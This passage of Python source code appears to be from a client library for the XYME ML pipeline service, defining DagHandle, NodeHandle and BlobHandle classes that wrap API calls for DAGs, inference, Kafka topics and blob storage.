class DagHandle:
def __init__(
self,
client: XYMEClient,
dag_uri: str) -> None:
self._client = client
self._dag_uri = dag_uri
self._name: Optional[str] = None
self._company: Optional[str] = None
self._state: Optional[str] = None
self._is_high_priority: Optional[bool] = None
self._queue_mng: Optional[str] = None
self._nodes: Dict[str, NodeHandle] = {}
self._node_lookup: Dict[str, str] = {}
self._dynamic_error: Optional[str] = None
self._ins: Optional[List[str]] = None
self._outs: Optional[List[Tuple[str, str]]] = None
def refresh(self) -> None:
self._name = None
self._company = None
self._state = None
self._is_high_priority = None
self._queue_mng = None
self._ins = None
self._outs = None
# NOTE: we don't reset nodes
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _maybe_fetch(self) -> None:
if self._name is None:
self._fetch_info()
def get_info(self) -> DagInfo:
return cast(DagInfo, self._client.request_json(
METHOD_GET, "/dag_info", {
"dag": self.get_uri(),
}))
def _fetch_info(self) -> None:
info = self.get_info()
self._name = info["name"]
self._company = info["company"]
self._state = info["state"]
self._is_high_priority = info["high_priority"]
self._queue_mng = info["queue_mng"]
self._ins = info["ins"]
self._outs = [(el[0], el[1]) for el in info["outs"]]
old_nodes = {} if self._nodes is None else self._nodes
self._nodes = {
node["id"]: NodeHandle.from_node_info(
self._client, self, node, old_nodes.get(node["id"]))
for node in info["nodes"]
}
self._node_lookup = {
node["name"]: node["id"]
for node in info["nodes"]
if node["name"] is not None
}
def get_nodes(self) -> List[str]:
self._maybe_refresh()
self._maybe_fetch()
return list(self._nodes.keys())
def get_node(self, node_name: str) -> 'NodeHandle':
self._maybe_refresh()
self._maybe_fetch()
node_id = self._node_lookup.get(node_name, node_name)
return self._nodes[node_id]
def get_uri(self) -> str:
return self._dag_uri
def get_name(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._name is not None
return self._name
def get_company(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._company is not None
return self._company
def get_state_type(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._state is not None
return self._state
def get_timing(
self,
blacklist: Optional[List[str]] = None,
) -> TimingResult:
blist = [] if blacklist is None else blacklist
node_timing: Dict[str, NodeTiming] = {}
nodes = self.get_nodes()
def get_filterd_times(
node_time: List[Timing]) -> Tuple[float, float, List[Timing]]:
fns = []
node_total = 0.0
for value in node_time:
if value["name"] not in blist:
fns.append(value)
node_total += value["total"]
if not fns:
return (0, 0, fns)
return (node_total, node_total / len(fns), fns)
dag_total = 0.0
for node in nodes:
node_get = self.get_node(node)
node_time = node_get.get_timing()
node_name = node_get.get_node_def()["name"]
node_id = node_get.get_id()
node_total, avg_time, fns = get_filterd_times(node_time)
node_timing[node_id] = {
"node_name": node_name,
"node_total": node_total,
"node_avg": avg_time,
"fns": fns,
}
dag_total += node_total
node_timing_sorted = sorted(
node_timing.items(),
key=lambda x: x[1]["node_total"],
reverse=True)
return {
"dag_total": dag_total,
"nodes": node_timing_sorted,
}
def is_high_priority(self) -> bool:
self._maybe_refresh()
self._maybe_fetch()
assert self._is_high_priority is not None
return self._is_high_priority
def is_queue(self) -> bool:
self._maybe_refresh()
self._maybe_fetch()
return self._queue_mng is not None
def get_queue_mng(self) -> Optional[str]:
self._maybe_refresh()
self._maybe_fetch()
return self._queue_mng
def get_ins(self) -> List[str]:
self._maybe_refresh()
self._maybe_fetch()
assert self._ins is not None
return self._ins
def get_outs(self) -> List[Tuple[str, str]]:
self._maybe_refresh()
self._maybe_fetch()
assert self._outs is not None
return self._outs
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
def set_dag(self, defs: DagDef) -> None:
self._client.set_dag(self.get_uri(), defs)
def dynamic_model(
self,
inputs: List[Any],
format_method: str = "simple",
no_cache: bool = False) -> List[Any]:
res = cast(DynamicResults, self._client.request_json(
METHOD_POST, "/dynamic_model", {
"format": format_method,
"inputs": inputs,
"no_cache": no_cache,
"dag": self.get_uri(),
}))
return res["results"]
def dynamic_list(
self,
inputs: List[Any],
input_key: Optional[str] = None,
output_key: Optional[str] = None,
split_th: Optional[int] = 1000,
max_threads: int = 50,
format_method: str = "simple",
force_keys: bool = False,
no_cache: bool = False) -> List[Any]:
if split_th is None or len(inputs) <= split_th:
res = cast(DynamicResults, self._client.request_json(
METHOD_POST, "/dynamic_list", {
"force_keys": force_keys,
"format": format_method,
"input_key": input_key,
"inputs": inputs,
"no_cache": no_cache,
"output_key": output_key,
"dag": self.get_uri(),
}))
return res["results"]
# FIXME: write generic spliterator implementation
split_num: int = split_th
assert split_num > 0
res_arr: List[Any] = [None] * len(inputs)
exc: List[Optional[BaseException]] = [None]
active_ths: Set[threading.Thread] = set()
def compute_half(cur: List[Any], offset: int) -> None:
if exc[0] is not None:
return
if len(cur) <= split_num:
try:
cur_res = self.dynamic_list(
cur,
input_key=input_key,
output_key=output_key,
split_th=None,
max_threads=max_threads,
format_method=format_method,
force_keys=force_keys,
no_cache=no_cache)
res_arr[offset:offset + len(cur_res)] = cur_res
except BaseException as e: # pylint: disable=broad-except
exc[0] = e
return
half_ix: int = len(cur) // 2
args_first = (cur[:half_ix], offset)
args_second = (cur[half_ix:], offset + half_ix)
if len(active_ths) < max_threads:
comp_th = threading.Thread(
target=compute_half, args=args_first)
active_ths.add(comp_th)
comp_th.start()
compute_half(*args_second)
comp_th.join()
active_ths.remove(comp_th)
else:
compute_half(*args_first)
compute_half(*args_second)
compute_half(inputs, 0)
for remain_th in active_ths:
remain_th.join()
raise_e = exc[0]
try:
if isinstance(raise_e, BaseException):
raise raise_e # pylint: disable=raising-bad-type
except RequestException as e:
raise ValueError(
"request error while processing. processing time per batch "
"might be too large. try reducing split_th") from e
return res_arr
def dynamic(self, input_data: BytesIO) -> ByteResponse:
cur_res, ctype = self._client.request_bytes(
METHOD_FILE, "/dynamic", {
"dag": self.get_uri(),
}, files={
"file": input_data,
})
return interpret_ctype(cur_res, ctype)
def dynamic_obj(self, input_obj: Any) -> ByteResponse:
bio = BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
return self.dynamic(bio)
def dynamic_async(
self, input_data: List[BytesIO]) -> List['ComputationHandle']:
names = [f"file{pos}" for pos in range(len(input_data))]
res: Dict[str, str] = self._client.request_json(
METHOD_FILE, "/dynamic_async", {
"dag": self.get_uri(),
}, files=dict(zip(names, input_data)))
return [
ComputationHandle(
self,
res[name],
self.get_dynamic_error_message,
self.set_dynamic_error_message)
for name in names]
def set_dynamic_error_message(self, msg: Optional[str]) -> None:
self._dynamic_error = msg
def get_dynamic_error_message(self) -> Optional[str]:
return self._dynamic_error
def dynamic_async_obj(
self, input_data: List[Any]) -> List['ComputationHandle']:
return self.dynamic_async([
BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
for input_obj in input_data
])
def get_dynamic_result(self, value_id: str) -> ByteResponse:
try:
cur_res, ctype = self._client.request_bytes(
METHOD_GET, "/dynamic_result", {
"dag": self.get_uri(),
"id": value_id,
})
except HTTPError as e:
if e.response.status_code == 404:
raise KeyError(f"value_id {value_id} does not exist") from e
raise e
return interpret_ctype(cur_res, ctype)
def get_dynamic_status(
self,
value_ids: List['ComputationHandle']) -> Dict[
'ComputationHandle', QueueStatus]:
res = cast(DynamicStatusResponse, self._client.request_json(
METHOD_POST, "/dynamic_status", {
"value_ids": [value_id.get_id() for value_id in value_ids],
"dag": self.get_uri(),
}))
status = res["status"]
hnd_map = {value_id.get_id(): value_id for value_id in value_ids}
return {
hnd_map[key]: cast(QueueStatus, value)
for key, value in status.items()
}
def get_dynamic_bulk(
self,
input_data: List[BytesIO],
max_buff: int = 4000,
block_size: int = 5,
num_threads: int = 20) -> Iterable[ByteResponse]:
def get(hnd: 'ComputationHandle') -> ByteResponse:
return hnd.get()
success = False
try:
yield from async_compute(
input_data,
self.dynamic_async,
get,
lambda: self.check_queue_stats(minimal=True),
self.get_dynamic_status,
max_buff,
block_size,
num_threads)
success = True
finally:
if success:
self.set_dynamic_error_message(None)
def get_dynamic_bulk_obj(
self,
input_data: List[Any],
max_buff: int = 4000,
block_size: int = 5,
num_threads: int = 20) -> Iterable[ByteResponse]:
def get(hnd: 'ComputationHandle') -> ByteResponse:
return hnd.get()
success = False
try:
yield from async_compute(
input_data,
self.dynamic_async_obj,
get,
lambda: self.check_queue_stats(minimal=True),
self.get_dynamic_status,
max_buff,
block_size,
num_threads)
success = True
finally:
if success:
self.set_dynamic_error_message(None)
def _pretty(
self,
nodes_only: bool,
allow_unicode: bool,
method: Optional[str] = "accern",
fields: Optional[List[str]] = None) -> PrettyResponse:
args = {
"dag": self.get_uri(),
"nodes_only": nodes_only,
"allow_unicode": allow_unicode,
"method": method,
}
if fields is not None:
args["fields"] = ",".join(fields)
return cast(PrettyResponse, self._client.request_json(
METHOD_GET, "/pretty", args))
def pretty(
self,
nodes_only: bool = False,
allow_unicode: bool = True,
method: Optional[str] = "dot",
fields: Optional[List[str]] = None,
output_format: Optional[str] = "png",
display: Optional[IO[Any]] = sys.stdout) -> Optional[str]:
def render(value: str) -> Optional[str]:
if display is not None:
display.write(value)
display.flush()
return None
return value
graph_str = self._pretty(
nodes_only=nodes_only,
allow_unicode=allow_unicode,
method=method,
fields=fields)["pretty"]
if method == "accern":
return render(graph_str)
if method == "dot":
try:
from graphviz import Source
graph = Source(graph_str)
if output_format == "dot":
return render(graph_str)
if output_format == "svg":
svg_str = graph.pipe(format="svg")
if display is not None:
if not is_jupyter():
display.write(
"Warning: Ipython instance not found.\n")
display.write(svg_str)
display.flush()
else:
from IPython.display import display as idisplay
from IPython.display import SVG
idisplay(SVG(svg_str))
return None
return svg_str
if output_format == "png":
graph = Source(graph_str)
png_str = graph.pipe(format="png")
if display is not None:
if not is_jupyter():
display.write(
"Warning: Ipython instance not found.\n")
display.write(png_str)
display.flush()
else:
from IPython.display import display as idisplay
from IPython.display import Image
idisplay(Image(png_str))
return None
return png_str
if output_format == "ascii":
if not has_graph_easy():
return render(graph_str)
import subprocess
cmd = ["echo", graph_str]
p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE)
p2 = subprocess.check_output(
["graph-easy"], stdin=p1.stdout)
res = p2.decode("utf-8")
return render(res)
raise ValueError(
f"invalid format {output_format}, "
"use svg, png, ascii, or dot")
except ExecutableNotFound as e:
raise RuntimeError(
"use 'brew install graphviz' or use 'method=accern'",
) from e
raise ValueError(
f"invalid method {method}, use accern or dot")
def pretty_obj(
self,
nodes_only: bool = False,
allow_unicode: bool = True,
fields: Optional[List[str]] = None) -> List[DagPrettyNode]:
return self._pretty(
nodes_only=nodes_only,
allow_unicode=allow_unicode,
fields=fields)["nodes"]
def get_def(self, full: bool = True) -> DagDef:
return cast(DagDef, self._client.request_json(
METHOD_GET, "/dag_def", {
"dag": self.get_uri(),
"full": full,
}))
def set_attr(self, attr: str, value: Any) -> None:
dag_def = self.get_def()
dag_def[attr] = value # type: ignore
self._client.set_dag(self.get_uri(), dag_def)
def set_name(self, value: str) -> None:
self.set_attr("name", value)
def set_company(self, value: str) -> None:
self.set_attr("company", value)
def set_state(self, value: str) -> None:
self.set_attr("state", value)
def set_high_priority(self, value: bool) -> None:
self.set_attr("high_priority", value)
def set_queue_mng(self, value: Optional[str]) -> None:
self.set_attr("queue_mng", value)
@overload
def check_queue_stats( # pylint: disable=no-self-use
self, minimal: Literal[True]) -> MinimalQueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self, minimal: Literal[False]) -> QueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self, minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
...
def check_queue_stats(self, minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
return self._client.check_queue_stats(self.get_uri(), minimal=minimal)
def scale_worker(self, replicas: int) -> int:
return cast(WorkerScale, self._client.request_json(
METHOD_PUT, "/worker", {
"dag": self.get_uri(),
"replicas": replicas,
"task": None,
}))["num_replicas"]
def reload(self, timestamp: Optional[float] = None) -> float:
return cast(DagReload, self._client.request_json(
METHOD_PUT, "/dag_reload", {
"dag": self.get_uri(),
"when": timestamp,
}))["when"]
def get_kafka_input_topic(self, postfix: str = "") -> str:
res = cast(KafkaTopicNames, self._client.request_json(
METHOD_GET, "/kafka_topic_names", {
"dag": self.get_uri(),
"postfix": postfix,
"no_output": True,
}))["input"]
assert res is not None
return res
def get_kafka_output_topic(self) -> str:
res = cast(KafkaTopicNames, self._client.request_json(
METHOD_GET, "/kafka_topic_names", {
"dag": self.get_uri(),
}))["output"]
assert res is not None
return res
def set_kafka_topic_partitions(
self,
num_partitions: int,
postfix: str = "",
large_input_retention: bool = False,
no_output: bool = False) -> KafkaTopics:
return cast(KafkaTopics, self._client.request_json(
METHOD_POST, "/kafka_topics", {
"dag": self.get_uri(),
"num_partitions": num_partitions,
"postfix": postfix,
"large_input_retention": large_input_retention,
"no_output": no_output,
}))
def post_kafka_objs(self, input_objs: List[Any]) -> List[str]:
bios = [
BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
for input_obj in input_objs
]
return self.post_kafka_msgs(bios)
def post_kafka_msgs(
self,
input_data: List[BytesIO],
postfix: str = "") -> List[str]:
names = [f"file{pos}" for pos in range(len(input_data))]
res = cast(KafkaMessage, self._client.request_json(
METHOD_FILE, "/kafka_msg", {
"dag": self.get_uri(),
"postfix": postfix,
}, files=dict(zip(names, input_data))))
msgs = res["messages"]
return [msgs[key] for key in names]
def read_kafka_output(
self,
offset: str = "current",
max_rows: int = 100) -> Optional[ByteResponse]:
offset_str = [offset]
def read_single() -> Tuple[ByteResponse, str]:
cur, read_ctype = self._client.request_bytes(
METHOD_GET, "/kafka_msg", {
"dag": self.get_uri(),
"offset": offset_str[0],
})
offset_str[0] = "current"
return interpret_ctype(cur, read_ctype), read_ctype
if max_rows <= 1:
return read_single()[0]
res: List[ByteResponse] = []
ctype: Optional[str] = None
while True:
val, cur_ctype = read_single()
if val is None:
break
if ctype is None:
ctype = cur_ctype
elif ctype != cur_ctype:
raise ValueError(
f"inconsistent return types {ctype} != {cur_ctype}")
res.append(val)
if len(res) >= max_rows:
break
if not res or ctype is None:
return None
return merge_ctype(res, ctype)
def get_kafka_offsets(
self, alive: bool, postfix: Optional[str] = None) -> KafkaOffsets:
args = {
"dag": self.get_uri(),
"alive": int(alive),
}
if postfix is not None:
args["postfix"] = postfix
return cast(KafkaOffsets, self._client.request_json(
METHOD_GET, "/kafka_offsets", args))
def get_kafka_throughput(
self,
postfix: Optional[str] = None,
segment_interval: float = 120.0,
segments: int = 5) -> KafkaThroughput:
assert segments > 0
assert segment_interval > 0.0
offsets = self.get_kafka_offsets(postfix=postfix, alive=False)
now = time.monotonic()
measurements: List[Tuple[int, int, int, float]] = [(
offsets["input"],
offsets["output"],
offsets["error"],
now,
)]
for _ in range(segments):
prev = now
while now - prev < segment_interval:
time.sleep(max(0.0, segment_interval - (now - prev)))
now = time.monotonic()
offsets = self.get_kafka_offsets(postfix=postfix, alive=False)
measurements.append((
offsets["input"],
offsets["output"],
offsets["error"],
now,
))
first = measurements[0]
last = measurements[-1]
total_input = last[0] - first[0]
total_output = last[1] - first[1]
errors = last[2] - first[2]
total = last[3] - first[3]
input_segments: List[float] = []
output_segments: List[float] = []
cur_input = first[0]
cur_output = first[1]
cur_time = first[3]
for (next_input, next_output, _, next_time) in measurements[1:]:
seg_time = next_time - cur_time
input_segments.append((next_input - cur_input) / seg_time)
output_segments.append((next_output - cur_output) / seg_time)
cur_input = next_input
cur_output = next_output
cur_time = next_time
inputs = pd.Series(input_segments)
outputs = pd.Series(output_segments)
return {
"dag": self.get_uri(),
"input": {
"throughput": total_input / total,
"max": inputs.max(),
"min": inputs.min(),
"stddev": inputs.std(),
"segments": segments,
"count": total_input,
"total": total,
},
"output": {
"throughput": total_output / total,
"max": outputs.max(),
"min": outputs.min(),
"stddev": outputs.std(),
"segments": segments,
"count": total_output,
"total": total,
},
"faster": "both" if total_input == total_output else (
"input" if total_input > total_output else "output"),
"errors": errors,
}
def get_kafka_group(self) -> KafkaGroup:
return cast(KafkaGroup, self._client.request_json(
METHOD_GET, "/kafka_group", {
"dag": self.get_uri(),
}))
def set_kafka_group(
self,
group_id: Optional[str] = None,
reset: Optional[str] = None,
**kwargs: Any) -> KafkaGroup:
return cast(KafkaGroup, self._client.request_json(
METHOD_PUT, "/kafka_group", {
"dag": self.get_uri(),
"group_id": group_id,
"reset": reset,
**kwargs,
}))
def delete(self) -> DeleteBlobResponse:
return cast(DeleteBlobResponse, self._client.request_json(
METHOD_DELETE, "/blob", {
"blob_uris": [self.get_uri()],
},
))
def __hash__(self) -> int:
return hash(self.get_uri())
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
return self.get_uri() == other.get_uri()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self.get_uri()
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.get_uri()}]"
# *** DagHandle ***
class NodeHandle:
def __init__(
self,
client: XYMEClient,
dag: DagHandle,
node_id: str,
node_name: str,
kind: str) -> None:
self._client = client
self._dag = dag
self._node_id = node_id
self._node_name = node_name
self._type = kind
self._blobs: Dict[str, BlobHandle] = {}
self._inputs: Dict[str, Tuple[str, str]] = {}
self._state: Optional[int] = None
self._config_error: Optional[str] = None
self._is_model: Optional[bool] = None
def as_owner(self) -> BlobOwner:
return {
"owner_dag": self.get_dag().get_uri(),
"owner_node": self.get_id(),
}
@staticmethod
def from_node_info(
client: XYMEClient,
dag: DagHandle,
node_info: NodeInfo,
prev: Optional['NodeHandle']) -> 'NodeHandle':
if prev is None:
res = NodeHandle(
client,
dag,
node_info["id"],
node_info["name"],
node_info["type"])
else:
if prev.get_dag() != dag:
raise ValueError(f"{prev.get_dag()} != {dag}")
res = prev
res.update_info(node_info)
return res
def update_info(self, node_info: NodeInfo) -> None:
if self.get_id() != node_info["id"]:
raise ValueError(f"{self._node_id} != {node_info['id']}")
self._node_name = node_info["name"]
self._type = node_info["type"]
self._blobs = {
key: BlobHandle(self._client, value, is_full=False)
for (key, value) in node_info["blobs"].items()
}
self._inputs = node_info["inputs"]
self._state = node_info["state"]
self._config_error = node_info["config_error"]
def get_dag(self) -> DagHandle:
return self._dag
def get_id(self) -> str:
return self._node_id
def get_name(self) -> str:
return self._node_name
def get_type(self) -> str:
return self._type
def get_node_def(self) -> NodeDefInfo:
return self._client.get_node_defs()[self.get_type()]
def get_inputs(self) -> Set[str]:
return set(self._inputs.keys())
def get_input(self, key: str) -> Tuple['NodeHandle', str]:
node_id, out_key = self._inputs[key]
return self.get_dag().get_node(node_id), out_key
def get_status(self) -> TaskStatus:
return cast(NodeStatus, self._client.request_json(
METHOD_GET, "/node_status", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["status"]
def has_config_error(self) -> bool:
return self._config_error is not None
def get_config_error(self) -> Optional[str]:
return self._config_error
def get_blobs(self) -> List[str]:
return sorted(self._blobs.keys())
def get_blob_handles(self) -> Dict[str, 'BlobHandle']:
return self._blobs
def get_blob_handle(self, key: str) -> 'BlobHandle':
return self._blobs[key]
def set_blob_uri(self, key: str, blob_uri: str) -> str:
return cast(PutNodeBlob, self._client.request_json(
METHOD_PUT, "/node_blob", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"blob_key": key,
"blob_uri": blob_uri,
}))["new_uri"]
def get_in_cursor_states(self) -> Dict[str, int]:
return cast(InCursors, self._client.request_json(
METHOD_GET, "/node_in_cursors", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["cursors"]
def get_highest_chunk(self) -> int:
return cast(NodeChunk, self._client.request_json(
METHOD_GET, "/node_chunk", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["chunk"]
def get_short_status(self, allow_unicode: bool = True) -> str:
status_map: Dict[TaskStatus, str] = {
"blocked": "B",
"waiting": "W",
"running": "→" if allow_unicode else "R",
"complete": "✓" if allow_unicode else "C",
"eos": "X",
"paused": "P",
"error": "!",
"unknown": "?",
"virtual": "∴" if allow_unicode else "V",
"queue": "=",
}
return status_map[self.get_status()]
def get_logs(self) -> str:
with self._client._raw_request_str(
METHOD_GET, "/node_logs", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}) as fin:
return fin.read()
def get_timing(self) -> List[Timing]:
return cast(Timings, self._client.request_json(
METHOD_GET, "/node_perf", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["times"]
def read_blob(
self,
key: str,
chunk: Optional[int],
force_refresh: bool) -> 'BlobHandle':
# FIXME: !!!!!! explicitly repeat on timeout
dag = self.get_dag()
res = cast(ReadNode, self._client.request_json(
METHOD_POST, "/read_node", {
"dag": dag.get_uri(),
"node": self.get_id(),
"key": key,
"chunk": chunk,
"is_blocking": True,
"force_refresh": force_refresh,
}))
uri = res["result_uri"]
if uri is None:
raise ValueError(f"uri is None: {res}")
return BlobHandle(self._client, uri, is_full=True)
def read(
self,
key: str,
chunk: Optional[int],
force_refresh: bool = False,
filter_id: bool = True) -> Optional[ByteResponse]:
content = self.read_blob(key, chunk, force_refresh).get_content()
if filter_id and isinstance(content, pd.DataFrame):
content = pd.DataFrame(content[content["row_id"] >= 0])
content = content.set_index("index", drop=True)
content.index.name = None
return content
def read_all(
self,
key: str,
force_refresh: bool = False,
filter_id: bool = True) -> Optional[ByteResponse]:
self.read(
key, chunk=None, force_refresh=force_refresh, filter_id=False)
res: List[ByteResponse] = []
ctype: Optional[str] = None
while True:
blob = self.read_blob(key, chunk=len(res), force_refresh=False)
cur = blob.get_content()
if cur is None:
break
cur_ctype = blob.get_ctype()
if ctype is None:
ctype = cur_ctype
elif ctype != cur_ctype:
raise ValueError(
f"inconsistent return types {ctype} != {cur_ctype}")
res.append(cur)
if not res or ctype is None:
return None
content = merge_ctype(res, ctype)
if filter_id and isinstance(content, pd.DataFrame):
content = pd.DataFrame(content[content["row_id"] >= 0])
content = content.set_index("index", drop=True)
content.index.name = None
return content
def clear(self) -> NodeState:
return cast(NodeState, self._client.request_json(
METHOD_PUT, "/node_state", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"action": "reset",
}))
def requeue(self) -> NodeState:
return cast(NodeState, self._client.request_json(
METHOD_PUT, "/node_state", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"action": "requeue",
}))
def fix_error(self) -> NodeState:
return cast(NodeState, self._client.request_json(
METHOD_PUT, "/node_state", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"action": "fix_error",
}))
def get_blob_uri(
self, blob_key: str, blob_type: str) -> Tuple[str, BlobOwner]:
res = cast(BlobURIResponse, self._client.request_json(
METHOD_GET, "/blob_uri", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"key": blob_key,
"type": blob_type,
}))
return res["uri"], res["owner"]
def get_csv_blob(self, key: str = "orig") -> 'CSVBlobHandle':
uri, owner = self.get_blob_uri(key, "csv")
blob = CSVBlobHandle(self._client, uri, is_full=False)
blob.set_local_owner(owner)
return blob
def get_json_blob(self, key: str = "jsons_in") -> 'JSONBlobHandle':
uri, owner = self.get_blob_uri(key, "json")
blob = JSONBlobHandle(self._client, uri, is_full=False)
blob.set_local_owner(owner)
return blob
def get_custom_code_blob(
self, key: str = "custom_code") -> 'CustomCodeBlobHandle':
uri, owner = self.get_blob_uri(key, "custom_code")
blob = CustomCodeBlobHandle(self._client, uri, is_full=False)
blob.set_local_owner(owner)
return blob
def check_custom_code_node(self) -> None:
if not self.get_type() in CUSTOM_NODE_TYPES:
raise ValueError(f"{self} is not a custom code node.")
def set_custom_imports(
self, modules: List[List[str]]) -> NodeCustomImports:
self.check_custom_code_node()
return cast(NodeCustomImports, self._client.request_json(
METHOD_PUT, "/custom_imports", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"modules": modules,
}))
def get_custom_imports(self) -> NodeCustomImports:
self.check_custom_code_node()
return cast(NodeCustomImports, self._client.request_json(
METHOD_GET, "/custom_imports", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))
def set_es_query(self, query: Dict[str, Any]) -> ESQueryResponse:
if self.get_type() != "es_reader":
raise ValueError(f"{self} is not an ES reader node")
return cast(ESQueryResponse, self._client.request_json(
METHOD_POST, "/es_query", {
"dag": self.get_dag().get_uri(),
"blob": self.get_blob_handle("es").get_uri(),
"es_query": query,
},
))
def get_es_query(self) -> ESQueryResponse:
if self.get_type() != "es_reader":
raise ValueError(f"{self} is not an ES reader node")
return cast(ESQueryResponse, self._client.request_json(
METHOD_GET, "/es_query", {
"dag": self.get_dag().get_uri(),
"blob": self.get_blob_handle("es").get_uri(),
},
))
def get_user_columns(self, key: str) -> NodeUserColumnsResponse:
return cast(NodeUserColumnsResponse, self._client.request_json(
METHOD_GET, "/user_columns", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"key": key,
}))
def get_input_example(self) -> Dict[str, Optional[ByteResponse]]:
res = {}
for key in self.get_inputs():
input_node, out_key = self.get_input(key)
df = input_node.read(out_key, 0)
if df is not None and isinstance(df, pd.DataFrame):
user_columns = \
input_node.get_user_columns(out_key)["user_columns"]
rmap = {col: col.replace("user_", "") for col in user_columns}
df = df.loc[:, user_columns].rename(columns=rmap)
res[key] = df
return res
def get_def(self) -> NodeDef:
return cast(NodeDef, self._client.request_json(
METHOD_GET, "/node_def", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))
# ModelLike Nodes only
def is_model(self) -> bool:
if self._is_model is None:
self._is_model = cast(NodeTypeResponse, self._client.request_json(
METHOD_GET, "/node_type", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))["is_model"]
return self._is_model
def ensure_is_model(self) -> None:
if not self.is_model():
raise ValueError(f"{self} is not a model node.")
def setup_model(self, obj: Dict[str, Any]) -> ModelInfo:
self.ensure_is_model()
return cast(ModelInfo, self._client.request_json(
METHOD_PUT, "/model_setup", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
"config": obj,
}))
def get_model_params(self) -> ModelParamsResponse:
self.ensure_is_model()
return cast(ModelParamsResponse, self._client.request_json(
METHOD_GET, "/model_params", {
"dag": self.get_dag().get_uri(),
"node": self.get_id(),
}))
def __hash__(self) -> int:
return hash((self.get_dag(), self.get_id()))
def __eq__(self, other: object) -> bool:
if not isinstance(other, self.__class__):
return False
if self.get_dag() != other.get_dag():
return False
return self.get_id() == other.get_id()
def __ne__(self, other: object) -> bool:
return not self.__eq__(other)
def __str__(self) -> str:
return self.get_id()
def __repr__(self) -> str:
return f"{self.__class__.__name__}[{self.get_id()}]"
# *** NodeHandle ***
EMPTY_BLOB_PREFIX = "null://"
class BlobHandle:
def __init__(
self,
client: XYMEClient,
uri: str,
is_full: bool) -> None:
self._client = client
self._uri = uri
self._is_full = is_full
self._ctype: Optional[str] = None
self._tmp_uri: Optional[str] = None
self._owner: Optional[BlobOwner] = None
self._info: Optional[Dict[str, Any]] = None
self._parent: Optional[BlobHandle] = None
def is_full(self) -> bool:
return self._is_full
def is_empty(self) -> bool:
return self._uri.startswith(EMPTY_BLOB_PREFIX)
def get_uri(self) -> str:
return self._uri
def get_path(self, *path: str) -> 'BlobHandle':
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
return BlobHandle(
self._client, f"{self._uri}/{'/'.join(path)}", is_full=True)
def get_parent(self) -> 'BlobHandle':
if self._parent is None:
uri = urlparse(self._uri)
path = PurePath(*PosixPath(uri.path).parts[:3])
new_uri = urlunparse(
(uri.scheme, uri.netloc, path.as_posix(), None, None, None))
res = BlobHandle(self._client, new_uri, is_full=False)
self._parent = res
return self._parent
def get_ctype(self) -> Optional[str]:
return self._ctype
def clear_info_cache(self) -> None:
self._info = None
def get_info(self) -> Dict[str, Any]:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
if self._info is None:
info = self.get_path("info.json").get_content()
assert info is not None
self._info = cast(Dict[str, Any], info)
return self._info
def get_content(self) -> Optional[ByteResponse]:
if not self.is_full():
raise ValueError(f"URI must be full: {self}")
if self.is_empty():
return None
sleep_time = 0.1
sleep_mul = 1.1
sleep_max = 5.0
total_time = 60.0
start_time = time.monotonic()
while True:
try:
fin, ctype = self._client.request_bytes(
METHOD_POST, "/uri", {
"uri": self.get_uri(),
})
self._ctype = ctype
return interpret_ctype(fin, ctype)
except HTTPError as e:
if e.response.status_code != 404:
raise e
if time.monotonic() - start_time >= total_time:
raise e
time.sleep(sleep_time)
sleep_time = min(sleep_time * sleep_mul, sleep_max)
def list_files(self) -> List['BlobHandle']:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
resp = cast(BlobFilesResponse, self._client.request_json(
METHOD_GET, "/blob_files", {
"blob": self.get_uri(),
}))
return [
BlobHandle(self._client, blob_uri, is_full=True)
for blob_uri in resp["files"]
]
def as_str(self) -> str:
return f"{self.get_uri()}"
def set_owner(self, owner: NodeHandle) -> BlobOwner:
if self.is_full():
raise ValueError(f"URI must not be full: {self}")
return cast(BlobOwner, self._client.request_json(
METHOD_PUT, "/blob_owner", {
"blob": self.get_uri(),
"owner_dag": owner.get_dag().get_uri(),
"owner_node": owner.get_id(),
}))
def get_owner(self) -> BlobOwner:
if self._owner is None:
self._owner = self._client.get_blob_owner(self.get_uri())
return self._owner
def set_local_owner(self, owner: BlobOwner) -> None:
self._owner = owner
def get_owner_dag(self) -> Optional[str]:
owner = self.get_owner()
return owner["owner_dag"]
def get_owner_node(self) -> str:
owner = self.get_owner()
return owner["owner_node"]
def copy_to(
self,
to_uri: str,
